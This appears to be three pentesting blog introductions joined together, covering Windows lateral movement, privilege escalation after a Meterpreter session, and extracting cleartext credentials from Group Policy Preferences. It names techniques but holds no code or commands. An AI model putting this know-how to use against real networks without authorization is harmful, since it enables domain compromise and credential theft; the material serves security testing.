Lateral Movement: An Overview
Regardless of the method utilized for gaining the initial foothold, penetration testers are often looking for ways to move around the client’s network (referred to as lateral movement or lateral spread). Other machines may hold goodies that further the engagement, whether it is documents that contain the company’s “crown jewels” or stored credentials that give access to databases, Domain Controllers, or other important assets.
While there is an art to gaining situational awareness and understanding the “lay of the land” once the initial foothold is established, this article will instead focus on a subset of tools and techniques for moving around the victim’s Windows environment.
Common Windows Privilege Escalation Vectors
Imagine this scenario: You’ve gotten a Meterpreter session on a machine (HIGH FIVE!), and you opt for running getsystem in an attempt to escalate your privileges… but what that proves unsuccessful? Should you throw in the towel? Only if you’re a quitter… but you’re not, are you? You’re a champion!!! 🙂
In this post I will walk us through common privilege escalation techniques on Windows, demonstrating how to “manually” accomplish each task as well as talk about any related Metasploit modules. While most techniques are easier to exploit when escalating from Local Administrator to SYSTEM, improperly configured machines can certainly allow escalation from unprivileged accounts in the right circumstances.
Privilege Escalation Via Group Policy Preferences (GPP)
While this is not a new topic in the penetration testing world by any means [Chris Gates (@carnal0wnage) and others were speaking about this way back in 2012], it is still prevalent across many networks today. It’s important enough to talk about because it is “low-hanging fruit” for pentesters (and hackers) and often one of the first things checked for after an initial foothold into a network, as it can quickly allow for escalation to Local Administrator and lateral movement. At that point, it often is just a matter of time before complete Domain compromise.
In this post we will explore the Windows Active Directory feature, Group Policy Preferences (GPP), that was introduced with Server 2008 and how we can exploit this feature to obtain cleartext credentials for privileged accounts in the Domain.